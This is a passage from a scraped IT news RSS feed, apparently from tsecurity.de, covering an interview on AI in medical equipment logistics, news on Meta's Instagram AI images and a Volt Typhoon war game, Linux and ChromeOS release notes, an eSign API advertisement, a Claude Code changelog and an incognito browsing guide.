<p><strong>On setting the right foundations:</strong> We’re in the middle of a major transformation. The company started with a homegrown system with phenomenal software, but as we’ve grown, it becomes more complicated to keep up with the rate of progress. So we decided to move to a SaaS platform and we have the first part of the project already complete. It’s been very successful and now we’re finishing the second part.</p>



<p>We can look not only at our business processes and refine them, but we think about embedding AI for faster and more accurate results. You have to have sound data and processes with AI. In one of my previous companies we used AI at the beginning when it was a buzzword and not really there. I learned a very important lesson then. You can fit the model, train it, and ask a specific question, but an unexpected answer might come back. So we went back to the old ways to analyze data and realized that the answer was right but the question was wrong.</p>



<p>I learned you have to be open to evaluate answers and understand where the real data is coming from, and the real sentiment on the data — the context of the information you’re working with.</p>



<p><strong>On human involvement: </strong>There always has to be a human in the loop. That doesn’t mean we can’t speed the process for that human. There’s incredible things we’re doing today where an AI doesn’t have to be just gen AI. There are so many variances of AI and versions of what you can do with it. For instance, we’ve been able to automate the ordering process from a single click at a hospital nurse station to our branch operations where we get all the information we need to deliver lifesaving equipment.</p>



<p>In one hospital in particular, we delivered a full bed and mattress in less than 15 minutes. To put that in context, industry standards are normally between 12 and 24 hours. So in certain cases when we’re in proximity, we can be extremely fast because there’s no human interaction.</p>



<p><strong>On AI and model training: </strong>We created a system called GoUSME Connect. It’s a combination of RPA, AI, and machine learning that can read a request generated by an electronic medical record system. So we’re agnostic of any EMR, and it reads information. And through machine learning, it reads the pattern of the request that transfers into an order, which ends up in one of our delivery locations.</p>



<p>That’s one part of how we can deliver equipment. We’re working hard to continue on predictive analytics and teaching the models because as a rental company, we have so much information about the true performance of medical equipment. Our goal in the next few months is to be able to predict equipment failures based on historical data.That’s the thing about medical equipment. It’s just a new computer. They have to go through preventive maintenance once a year, and every time they come back from a hospital, they go through review process.</p>



<p>So we always make sure equipment is patient ready. As we all know, though, equipment can fail. But if we can gather all the equipment we’ve rented in the last 23 years and start feeding those models with all that data, then we can be more predictive.</p>



<p><strong>On logistics: </strong>One of the first things is to know your inventory, what equipment you have. And in the medical equipment rental business, it could be very seasonal. You have times where you have respiratory issues, then you get neonatal seasons. So what it allows us to do is look at our past rentals, and our inventory, and then start helping the equipment management team plan their production for the next month, week, or the next day. That’s a huge change in how we used to do things to what we can do now.</p>



<p>From the time of getting equipment prepared to being patient ready in the old days could be like getting a call, having a technician look for the piece of equipment, and then do all the necessary paperwork and testing. Every interaction was very manual. Now we know where it’s coming from and we prepare it. If parts for a piece of equipment are needed, the parts requisition is already requested. We know where those parts are in the country, and we know we need to ship them somewhere else. So the days of doing all those things that waste time are gone.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[What Happens if China Hacks the US Water Supply? I Went to a Secret War Game to Find Out]]></title>
<description><![CDATA[Burst water mains. Evacuated hospitals. In a closed-door simulation, insurers played out their response to a mass disruption by China’s Volt Typhoon hackers—and found a nightmare scenario.]]></description>
<link>https://tsecurity.de/de/3653907/it-nachrichten/what-happens-if-china-hacks-the-us-water-supply-i-went-to-a-secret-war-game-to-find-out/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3653907/it-nachrichten/what-happens-if-china-hacks-the-us-water-supply-i-went-to-a-secret-war-game-to-find-out/</guid>
<pubDate>Wed, 08 Jul 2026 12:02:58 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Burst water mains. Evacuated hospitals. In a closed-door simulation, insurers played out their response to a mass disruption by China’s Volt Typhoon hackers—and found a nightmare scenario.]]></content:encoded>
</item>
<item>
<title><![CDATA[Meta Now Lets Anyone Use Your Instagram Photos In AI Images]]></title>
<description><![CDATA[An anonymous reader quotes a report from Wired: Meta launched its inaugural AI image model from the Meta Superintelligence Labs on Tuesday, its effort to compete with the likes of OpenAI's GPT Images 2.0 and Google's Nano Banana 2 in the AI image generation race. The new model, called Muse Image,...]]></description>
<link>https://tsecurity.de/de/3653184/it-security-nachrichten/meta-now-lets-anyone-use-your-instagram-photos-in-ai-images/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3653184/it-security-nachrichten/meta-now-lets-anyone-use-your-instagram-photos-in-ai-images/</guid>
<pubDate>Wed, 08 Jul 2026 05:53:43 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[An anonymous reader quotes a report from Wired: Meta launched its inaugural AI image model from the Meta Superintelligence Labs on Tuesday, its effort to compete with the likes of OpenAI's GPT Images 2.0 and Google's Nano Banana 2 in the AI image generation race. The new model, called Muse Image, rolled out with deep integrations woven into the Instagram app. As part of this update, public Instagram profiles are now automatically opted into being fodder for generative AI remixes. All someone has to do is tag your account's profile in a prompt -- if it's public -- and they can use Meta AI to generate an image using your likeness.
 
Meta positions this feature as a cheeky way to personalize generations with images of real people. "Whether you want to design a custom event invitation, mock up a collaborative creative concept, or generate a personalized graphic, tagging a username lets Meta AI use public photos to build a visual that's ready to post," reads one of Meta's announcement blogs about the new AI tool. [...] Instagram's help center site includes more details about how this feature will impact users, saying that "people may be able to create content with your Instagram content using AI features at Meta" if you leave your account public and on the default settings. (A previously archived version of this page from 2025 does not include similar, AI-focused language.) Instagram users who want to stop others from using their public posts for AI images (without switching your account to private) must manually disable the options under the app's "Sharing and reuse" settings. However, turning off the setting only blocks future AI generations; any AI images already created from their content will remain.
 
Meta also says users will not be notified when others create AI-generated content using their posts.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Meta+Now+Lets+Anyone+Use+Your+Instagram+Photos+In+AI+Images%3A+https%3A%2F%2Ftech.slashdot.org%2Fstory%2F26%2F07%2F07%2F2239255%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Ftech.slashdot.org%2Fstory%2F26%2F07%2F07%2F2239255%2Fmeta-now-lets-anyone-use-your-instagram-photos-in-ai-images%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://tech.slashdot.org/story/26/07/07/2239255/meta-now-lets-anyone-use-your-instagram-photos-in-ai-images?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[TUXEDO Computers is switching the base of TUXEDO OS from Ubuntu to Debian for greater stability and control.]]></title>
<description><![CDATA[submitted by    /u/mr_MADAFAKA   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3653117/linux-tipps/tuxedo-computers-is-switching-the-base-of-tuxedo-os-from-ubuntu-to-debian-for-greater-stability-and-control/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3653117/linux-tipps/tuxedo-computers-is-switching-the-base-of-tuxedo-os-from-ubuntu-to-debian-for-greater-stability-and-control/</guid>
<pubDate>Wed, 08 Jul 2026 04:25:43 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[  submitted by   <a href="https://www.reddit.com/user/mr_MADAFAKA"> /u/mr_MADAFAKA </a> <br> <span><a href="https://www.reddit.com/r/tuxedocomputers/comments/1upndpc/a_new_foundation_for_tuxedo_os_switching_to_debian/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1upu346/tuxedo_computers_is_switching_the_base_of_tuxedo/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[I have fewer problems with Linux than with Windows.]]></title>
<description><![CDATA[The title pretty much says it. I just wanted to share my experience in case it helps someone who's considering making the switch. I started dual-booting about two years ago after Microsoft announced Windows Recall. At the time, Windows worked perfectly fine for me, and I had never really had any ...]]></description>
<link>https://tsecurity.de/de/3653105/linux-tipps/i-have-fewer-problems-with-linux-than-with-windows/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3653105/linux-tipps/i-have-fewer-problems-with-linux-than-with-windows/</guid>
<pubDate>Wed, 08 Jul 2026 04:25:27 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>The title pretty much says it. I just wanted to share my experience in case it helps someone who's considering making the switch.</p> <p>I started dual-booting about two years ago after Microsoft announced <a href="https://www.windowscentral.com/software-apps/windows-11/windows-recall-faq-everything-you-need-to-know">Windows Recall</a>. At the time, Windows worked perfectly fine for me, and I had never really had any major issues with it, been using it since Windows XP.</p> <p>Ironically, ever since I started using Linux as my main OS, Windows has become the one giving me headaches.</p> <p>For example:</p> <ul> <li>My mouse constantly disconnects and reconnects on Windows, making FPS games nearly unplayable. The exact same mouse works flawlessly on Linux.</li> <li>I recently bought a game on Steam that launches with the wrong resolution on Windows. After trying everything I could think of, I still haven't fixed it. On Linux, it launches in the correct resolution immediately.</li> <li>My Windows installation is a completely fresh install, yet it feels painfully slow. Launching CS2 can take up to two minutes, while on Linux it starts in about ten seconds.</li> </ul> <p>The funny part is that Linux isn't just "good enough" anymore, it does <strong>everything else</strong> I used Windows for without any issues. Browsing, programming, gaming (for the vast majority of my library), Docker, virtualization, media, file management... everything just works.</p> <p>The only reasons I still keep Windows installed are:</p> <ul> <li>Playing games like Call of Duty or League of Legends with friends sometimes.</li> <li>Using a collection of very large Excel workbooks with complex macros and custom forms. I tried migrating them to LibreOffice, but they simply aren't compatible.</li> </ul> <p>Today I spend about <strong>95% of my time on Linux</strong>, and I don't regret switching for a second.</p> <p>I started with Linux Mint and eventually moved to Zorin OS. Both have been great, but what surprised me the most is that I now trust Linux more than Windows to <em>just work</em>.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/LetterheadNo2345"> /u/LetterheadNo2345 </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1uqfkiv/i_have_fewer_problems_with_linux_than_with_windows/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1uqfkiv/i_have_fewer_problems_with_linux_than_with_windows/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[deepin 25.2.0 Release Note]]></title>
<description><![CDATA[Dear deepin Community Members, To further optimize the user experience of the deepin 25 system and enhance its stability, the deepin 25.2.0 image is now officially released. This update focuses on improving Treeland stability and usability, file management and search experience, and DDE interacti...]]></description>
<link>https://tsecurity.de/de/3653029/unix-server/deepin-2520-release-note/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3653029/unix-server/deepin-2520-release-note/</guid>
<pubDate>Wed, 08 Jul 2026 03:31:26 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Dear deepin Community Members, To further optimize the user experience of the deepin 25 system and enhance its stability, the deepin 25.2.0 image is now officially released. This update focuses on improving Treeland stability and usability, file management and search experience, and DDE interaction and stability. It refines multiple high-frequency usage scenarios, fixes numerous known issues, and significantly improves system smoothness and reliability. I. Feature Updates 1. Treeland Treeland stability has been significantly improved, with over 20 stability fixes, focusing on abnormal behaviors during login, logout, multitasking view, window management, focus switching, and more; Continuous rolling integration of new Treeland ...<a href="https://www.deepin.org/en/deepin-25-2-release/">Read more</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Dev Channel Update for ChromeOS / ChromeOS Flex]]></title>
<description><![CDATA[ The ChromeOS Dev channel is being updated to OS version 16733.12.0 (Browser version 151.0.7922.14) for most ChromeOS devices.If you find new issues, please let us know one of the following ways:File a bugVisit our ChromeOS communitiesGeneral: Chromebook Help CommunityBeta Specific: ChromeOS Beta...]]></description>
<link>https://tsecurity.de/de/3652819/it-security-nachrichten/dev-channel-update-for-chromeos-chromeos-flex/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3652819/it-security-nachrichten/dev-channel-update-for-chromeos-chromeos-flex/</guid>
<pubDate>Tue, 07 Jul 2026 23:53:42 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p> <span color="rgba(0, 0, 0, 0.87)">The ChromeOS Dev channel is being updated to OS version </span><span color="rgba(0, 0, 0, 0.87)">16733.12.0</span><span color="rgba(0, 0, 0, 0.87)"> (Browser version </span><span color="rgba(0, 0, 0, 0.87)">151.0.7922.14</span><span color="rgba(0, 0, 0, 0.87)">) for most ChromeOS devices.</span></p><div><span><span>If you find new issues, please let us know one of the following ways:</span></span></div><ol><li><span><span><a href="https://bugs.chromium.org/p/chromium/issues/list"><span>File a bug</span></a></span></span></li><li aria-level="1"><p role="presentation"><span><span>Visit our ChromeOS communities</span></span></p></li><ol><li aria-level="2"><p role="presentation"><span><span>General: </span><a href="https://support.google.com/chromebook/community/?hl=en&amp;gpf=%23!forum%2Fchromebook-central"><span>Chromebook Help Community</span></a></span></p></li><li aria-level="2"><p role="presentation"><span><span>Beta Specific: </span><a href="https://support.google.com/chromeos-beta/community"><span>ChromeOS Beta Help Community</span></a></span></p></li></ol><li aria-level="1"><p role="presentation"><a href="https://support.google.com/chrome/answer/95315?hl=en&amp;co=GENIE.Platform%3DDesktop"><span><span><span>Report an issue or send feedback on Chrome</span></span></span></a></p></li><li aria-level="1"><p role="presentation"><span><span>Interested in switching channels? </span><a href="https://support.google.com/chromebook/answer/1086915"><span>Find out how.</span></a></span></p></li></ol><p><span><span><span>Alon Bajayo</span></span></span></p><p><span>Google ChromeOS</span></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[5 ways an eSign API eliminates bottlenecks in your document workflows]]></title>
<description><![CDATA[You implemented a standalone eSign solution, so why does the rest of your contract workflow still look like this?




Your CRM generates the contract, but to get it signed, your sales rep has to leave the CRM and open a separate eSignature application.



Once the signature comes back, someone ha...]]></description>
<link>https://tsecurity.de/de/3652803/it-security-nachrichten/5-ways-an-esign-api-eliminates-bottlenecks-in-your-document-workflows/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3652803/it-security-nachrichten/5-ways-an-esign-api-eliminates-bottlenecks-in-your-document-workflows/</guid>
<pubDate>Tue, 07 Jul 2026 23:35:41 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>You implemented a standalone<a href="https://www.gonitro.com/sign?utm_source=foundry&amp;utm_medium=referral&amp;utm_campaign=5+Ways+an+eSign+API+Eliminates+Bottlenecks+in+Your+Document+Workflows" rel="sponsored"> </a><a href="https://www.gonitro.com/sign?utm_source=foundry&amp;utm_medium=referral&amp;utm_campaign=5+Ways+an+eSign+API+Eliminates+Bottlenecks+in+Your+Document+Workflows" rel="sponsored">eSign solution</a>, so why does the rest of your contract workflow still look like this?<strong></strong></p>



<ul class="wp-block-list">
<li>Your CRM generates the contract, but to get it signed, your sales rep has to leave the CRM and open a separate eSignature application.</li>



<li>Once the signature comes back, someone has to manually update the deal status in Salesforce, upload the signed agreement to SharePoint, and notify Finance that the contract is ready for invoicing.</li>



<li>Each of these handoffs depends on someone remembering to do it, and on no one doing it twice or missing a step.</li>
</ul>



<p>The bottleneck isn’t getting the signature. It’s that signing lives in its own disconnected application, separate from the CRM, the document repository, and the finance system, which all need to know the contract is done.</p>



<p>eSignature solutions are supposed to speed up workflows, but if you just add eSign capabilities to manual processes, you’re sacrificing efficiency and ROI. Using an <a href="https://developers.gonitro.com/?utm_source=foundry&amp;utm_medium=referral&amp;utm_campaign=5+Ways+an+eSign+API+Eliminates+Bottlenecks+in+Your+Document+Workflows" rel="sponsored">eSign API</a> lets you eliminate the handoffs that are fragmenting workflows and creating bottlenecks by embedding signing capabilities directly into the systems teams are already using.</p>



<h2 class="wp-block-heading">5 ways an eSign API eliminates bottlenecks in document workflows</h2>



<p><strong>An eSign API</strong> lets business systems automatically generate, send, track, and store signature requests, without requiring employees to leave the applications where the work already happens. Rather than bolting on a separate signing tool, the API embeds eSign capability directly into the CRMs, ERPs, document management systems, and custom applications teams already rely on.. By integrating signing capabilities at the system level, an eSign API eliminates five common bottlenecks that standalone eSign solutions leave unresolved.</p>



<h3 class="wp-block-heading"><a></a>Bottleneck #1: Disconnected systems create manual handoffs</h3>



<p>CRMs, ERPs, etc., initiate agreements — but standalone eSign tools create a separate step, involving manually moving documents from one system or application to another via downloads, uploads, and email attachments, which is time-consuming and error-prone.</p>



<p>An eSign API-driven signing solution makes it possible to create signature requests, automate signed document retrieval, and check status inside an application through a REST API.</p>



<p><strong>What this means for your eSigning process:</strong></p>



<ul class="wp-block-list">
<li>Fewer manual steps</li>



<li>Lower error rates</li>



<li>Faster cycle times</li>



<li>Consistent process enforcement across teams</li>
</ul>



<h3 class="wp-block-heading">Bottleneck #2: Relying on email notifications and manual status tracking</h3>



<p>When teams rely on email notifications and spreadsheets to track signatures, it’s easy for time-sensitive documents to slip through the cracks.</p>



<p>An eSign API lets you programmatically track status, so systems can monitor envelopes, trigger alerts, and update records automatically.</p>



<p><strong>What this means for your eSigning process:</strong></p>



<ul class="wp-block-list">
<li>Real-time workflow visibility</li>



<li>Automated reminders</li>



<li>Better SLA tracking</li>



<li>Fewer support tickets asking, “Where is this document?”</li>
</ul>



<h3 class="wp-block-heading"><a></a>Bottleneck #3: Siloing signed documents in separate applications</h3>



<p>When contracts, onboarding forms, procurement approvals, and HR documents live in different applications, teams lose visibility and accessibility, putting data integrity and productivity at risk.</p>



<p>Using an eSign API to embed eSigning directly into CRMs, ERPs, HR platforms, and custom applications, rather than forcing users into a separate signing portal, creates a <strong>system of record</strong> that keeps the entire organization on the same page.</p>



<p><strong>What this means for your eSigning process:</strong></p>



<ul class="wp-block-list">
<li>Better user experience</li>



<li>Reduced context switching</li>



<li>Easier governance and auditing</li>
</ul>



<h3 class="wp-block-heading">Bottleneck #4: Manual processes break as document volume grows</h3>



<p>Processes that work “well enough” for dozens of signatures often break when teams are processing thousands of documents per month.</p>



<p>An eSign API that supports automated, enterprise-scale signing, paired with <a href="https://www.gonitro.com/pricing?utm_source=foundry&amp;utm_medium=referral&amp;utm_campaign=5+Ways+an+eSign+API+Eliminates+Bottlenecks+in+Your+Document+Workflows">predictable, usage-based pricing</a>, lets teams scale to thousands of signature transactions without adding administrative headcount to manage them.</p>



<p><strong>What this means for your eSigning process:</strong></p>



<ul class="wp-block-list">
<li>Automated high-volume processing</li>



<li>Consistent throughput</li>



<li>Reduced administrative overhead</li>



<li>More predictable operating costs</li>
</ul>



<h3 class="wp-block-heading">Bottleneck #5: Governance is applied inconsistently across manual workflows</h3>



<p>The right eSign API doesn’t just make the signing tool compliant; it makes <a href="https://www.gonitro.com/security-compliance/compliance?utm_source=foundry&amp;utm_medium=referral&amp;utm_campaign=5+Ways+an+eSign+API+Eliminates+Bottlenecks+in+Your+Document+Workflows">compliance</a> part of every workflow that touches it.</p>



<p>Because the API is built on infrastructure that complies with eIDAS, UETA, the ESIGN Act, SOC 2, and ISO 27001, every signature request generated through it inherits the same standards, regardless of which application, team, or process initiated it. That consistency is the real compliance benefit: instead of relying on each team to follow the right steps manually, the API enforces the same compliant process every time.</p>



<p><strong>What this means for your eSigning process:</strong></p>



<ul class="wp-block-list">
<li><a href="https://www.gonitro.com/security-compliance/legal?utm_source=foundry&amp;utm_medium=referral&amp;utm_campaign=5+Ways+an+eSign+API+Eliminates+Bottlenecks+in+Your+Document+Workflows" rel="sponsored">Legally binding signatures</a></li>



<li>Stronger auditability</li>



<li>Consistent retention workflows</li>



<li>Reduced compliance risk</li>



<li>Easier reporting and evidence collection</li>
</ul>



<h2 class="wp-block-heading">What to look for in an eSign API</h2>



<ul class="wp-block-list">
<li>Clear, comprehensive documentation</li>



<li>Reliable webhooks for real-time status updates</li>



<li>Strong security and compliance certifications</li>



<li>Flexible embedding options across applications</li>



<li>Scalable, predictable pricing</li>



<li>Responsive implementation support</li>
</ul>



<h2 class="wp-block-heading"><a></a>How the Nitro eSign API can help</h2>



<p>For organizations that have outgrown their standalone signing tools, the Nitro Sign API offers a cost-effective, developer-friendly way to automate high-volume workflows, embed eSigning, ensure compliance at scale, and create measurable visibility across enterprise workflows.</p>



<p><strong>Why choose the Nitro Sign API:</strong></p>



<ul class="wp-block-list">
<li><strong>Embed signing into existing systems: </strong>Generate and send signature requests directly from your CRM, ERP, customer portal, or custom application, so signing happens inside the tools your teams already use.</li>



<li><strong>Automate high-volume workflows: </strong>Generate, send, and track thousands of signature requests automatically, without manual follow-up or status checks.</li>



<li><strong>Scale predictably:</strong> Usage-based pricing with no hidden fees or overage penalties keeps costs predictable as transaction volume grows.</li>



<li><strong>Support governance: </strong>Built on infrastructure that meets SOC 2 Type II, HIPAA, ISO 27001, and GDPR standards, with global legal validity under eIDAS, UETA, and the ESIGN Act, so compliance and auditability scale with the workflow.</li>
</ul>



<p>Discover the benefits of using the Nitro eSign API to embed <a href="https://www.gonitro.com/resources/introducing-nitro-sign-standard-and-plus-simple-secure-esigning-for-every-business?utm_source=foundry&amp;utm_medium=referral&amp;utm_campaign=5+Ways+an+eSign+API+Eliminates+Bottlenecks+in+Your+Document+Workflows" rel="sponsored">Nitro Sign</a> functionality directly into your business applications, internal systems, and custom workflows.<a href="https://developers.gonitro.com/?utm_source=foundry&amp;utm_medium=referral&amp;utm_campaign=5+Ways+an+eSign+API+Eliminates+Bottlenecks+in+Your+Document+Workflows" rel="sponsored"><strong>Learn how the Nitro Sign API can help your team eliminate manual document work and scale signing across every workflow.</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[v2.1.203]]></title>
<description><![CDATA[What's changed

Added a warning when your login is about to expire, so you can re-authenticate before background sessions are interrupted
Added a grey ⏸ badge to the footer when in manual permission mode, making the active mode always visible
Added the session's additional working directories to ...]]></description>
<link>https://tsecurity.de/de/3652787/downloads/v21203/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3652787/downloads/v21203/</guid>
<pubDate>Tue, 07 Jul 2026 23:16:55 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's changed</h2>
<ul>
<li>Added a warning when your login is about to expire, so you can re-authenticate before background sessions are interrupted</li>
<li>Added a grey ⏸ badge to the footer when in manual permission mode, making the active mode always visible</li>
<li>Added the session's additional working directories to MCP <code>roots/list</code>, with <code>notifications/roots/list_changed</code> sent when the set changes</li>
<li>Fixed opening or switching background agent sessions on macOS stalling for 15–20 seconds due to a false low-memory detection (regression in 2.1.196)</li>
<li>Fixed background sessions becoming permanently unresponsive to attach, replies, and stop when the daemon's session token went stale — the session now recovers automatically</li>
<li>Fixed returning to <code>claude agents</code> silently stopping running subagents and re-running the prompt from scratch — their work now carries over</li>
<li>Fixed a memory and per-turn CPU regression in interactive sessions: the context-usage indicator no longer re-analyzes the entire transcript after every turn</li>
<li>Fixed background agents inheriting a stale <code>PATH</code> from the daemon instead of the dispatching shell, causing missing tools on Windows</li>
<li>Fixed background and agent-view sessions dropping a shell-exported <code>ANTHROPIC_BASE_URL</code>, which sent API keys to the default endpoint and failed with 401</li>
<li>Fixed Bash failing with "argument list too long" in repos with many git worktrees</li>
<li>Fixed worktree-isolated subagents sometimes running shell commands in the parent checkout instead of their own worktree</li>
<li>Fixed worktree creation rejecting nested repositories in multi-repo workspaces, leaving background sessions unable to isolate and edit</li>
<li>Fixed background agents crash-looping when their working directory was deleted, replaced by a file, or became an invalid path — they now fail once with a clear error</li>
<li>Fixed a background daemon auto-upgrade failure silently killing all running background sessions</li>
<li>Fixed <code>TaskStop</code> and <code>TaskOutput</code> failing to find background agents spawned by another agent — errors now list running agents by id and description</li>
<li>Fixed the <code>claude agents</code> composer discarding your typed message when a slash command isn't available there</li>
<li>Fixed the agent list crashing when opening a stopped session whose conversation was already open in another session</li>
<li>Fixed background sessions showing "Needs input" in the agent list after the question was already answered</li>
<li>Fixed background agent startup failures showing only "exit_with_message" instead of the actual error</li>
<li>Fixed background sessions ignoring <code>effortLevel</code> changes in settings.json when forked through the daemon</li>
<li>Fixed attached background sessions ignoring <code>CLAUDE_CODE_DISABLE_MOUSE</code> and <code>CLAUDE_CODE_DISABLE_MOUSE_CLICKS</code> opt-outs</li>
<li>Fixed <code>/exit</code> incorrectly warning about running background agents after all named agents had completed</li>
<li>Fixed background sessions started from a non-git directory unable to edit files when a <code>WorktreeCreate</code> hook was configured</li>
<li>Fixed the <code>@</code> directory picker in <code>claude agents</code> not showing registered git worktrees</li>
<li>Fixed background task output on Windows being permanently replaced by an empty file after <code>/clear</code></li>
<li>Fixed content jumping when scrolling up through long transcript history</li>
<li>Fixed the terminal flickering and jumping while typing in bash mode when a shell-history suggestion was shown</li>
<li>Fixed literal <code>^[[I</code> / <code>^[[O</code> escape codes being printed when reattaching to a background session</li>
<li>Fixed LSP-only plugins being incorrectly flagged for disuse when their language servers deliver diagnostics or answer navigation requests</li>
<li>Improved responsiveness while long responses stream: live-preview updates no longer re-render the whole screen</li>
<li>Improved subagent behavior: agents are now less likely to re-delegate their entire task to another subagent</li>
<li>Reduced binary size by ~7 MB and startup memory by ~7 MB by loading a large bundled dependency lazily instead of inlining it</li>
<li>Changed left arrow to no longer close the background tasks, diff, and workflow detail views — press Esc instead</li>
<li>Changed the empty <code>claude agents</code> view to always show the organized sections (Needs input / Working / Completed) with descriptions</li>
<li>Removed the startup "claude command missing or broken" warnings — they now appear in <code>/doctor</code> and <code>/status</code> instead</li>
<li>Removed a redundant navigation hint from the <code>claude agents</code> footer</li>
<li>[VSCode] Added a Settings toggle for "Enable Remote Control for all sessions"</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[How to go incognito in Chrome, Edge, Firefox, and Safari]]></title>
<description><![CDATA[Private browsing. Incognito. Privacy mode.



Web browser functions like those trace their roots back more than a decade, and the feature — first found in a top browser in 2005 — spread quickly as one copied another, made tweaks and minor improvements.



But privacy-promising labels can be treac...]]></description>
<link>https://tsecurity.de/de/3652543/it-nachrichten/how-to-go-incognito-in-chrome-edge-firefox-and-safari/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3652543/it-nachrichten/how-to-go-incognito-in-chrome-edge-firefox-and-safari/</guid>
<pubDate>Tue, 07 Jul 2026 20:51:05 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Private browsing. Incognito. Privacy mode.</p>



<p>Web browser functions like those trace their roots back more than a decade, and the feature — first found in a top browser in 2005 — spread quickly as one copied another, made tweaks and minor improvements.</p>



<p>But privacy-promising labels can be treacherous. Simply put, going “<a href="https://www.computerworld.com/article/1670600/you-are-not-very-incognito-in-incognito-mode.html" title="Incognito">incognito</a>” is as effective in guarding <a href="https://www.computerworld.com/article/1612064/cookie-conundrum-the-loss-of-third-party-trackers-could-diminish-your-privacy.html">online privacy</a> as witchcraft is in warding off a common cold.</p>



<p>That’s because private browsing is intended to wipe <i>local</i> traces of where you’ve been, what you’ve searched for, the contents of forms you’ve filled. It’s meant to hide, and not always conclusively at that, your tracks from others with access to the personal computer. That’s it.</p>



<h2 class="wp-block-heading">How to keep web browsing private</h2>



<p>We’ve spelled out how to go into incognito or private browsing mode for the four major browsers in this order: </p>



<ul class="wp-block-list">
<li>Google Chrome’s Incognito mode</li>



<li>Microsoft Edge’s InPrivate browsing</li>



<li>Mozilla Firefox’s New Private Window mode</li>



<li>Apple Safari’s New Private window mode</li>
</ul>



<p>At their most basic, these features promise that they won’t record visited sites to the browsing history, save cookies that show you’ve been to and logged into sites, or remember credentials like passwords used during sessions. But your traipses through the web are still <a href="https://www.computerworld.com/article/1611809/what-a-future-without-browser-cookies-will-look-like.html">traceable by Internet providers</a> – and the authorities who serve subpoenas to those entities – employers who control the company network and advertisers who follow your every footstep.</p>



<p>To end that cognitive dissonance, <a href="https://www.computerworld.com/article/1639403/online-privacy-best-browsers-settings-and-tips.html">most browsers have added more advanced privacy tools</a>, generically known as “anti-trackers,” which block various kinds of bite-sized chunks of code that advertisers and websites use to trace where people go in attempts to compile digital dossiers or serve targeted advertisements.</p>



<p>Although it might seem reasonable that a browser’s end game would be to craft a system that blends incognito modes with anti-tracking, it’s highly unlikely. Using either private browsing or anti-tracking carries a cost: site passwords aren’t saved for the next visit or sites break under the tracker scrubbing. Nor are those costs equal. It’s much easier to turn on some level of anti-tracking by default than it would be to do the same for private sessions, as evidenced by the number of browsers that do the former without complaint while <i>none</i> do the latter.</p>



<p>Private browsing will, by necessity, always be a niche, as long as sites rely on cookies for mundane things like log-ins and cart contents.</p>



<p>But the mode remains a useful tool whenever the browser — and the computer it’s on — are shared. To prove that, we’ve assembled instructions and insights on using the incognito features — and anti-tracking tools — offered by the top four browsers: <a title="Google Chrome" href="https://www.computerworld.com/article/1719300/a-mac-user-s-guide-to-the-google-chrome-browser.html">Google Chrome</a>, Microsoft’s <a href="https://www.computerworld.com/article/1713244/how-to-replace-edge-as-windows-default-browser.html">Chromium-based Edge</a>, Mozilla’s Firefox and Apple’s Safari.</p>



<h2 class="wp-block-heading">How to go incognito with Google Chrome</h2>



<p>Although <i>incognito</i> may be a synonym to some users for any browser’s private mode, Google gets credit for grabbing the word as the feature’s snappiest name when it launched the tool in late 2008, just months after Chrome debuted.</p>



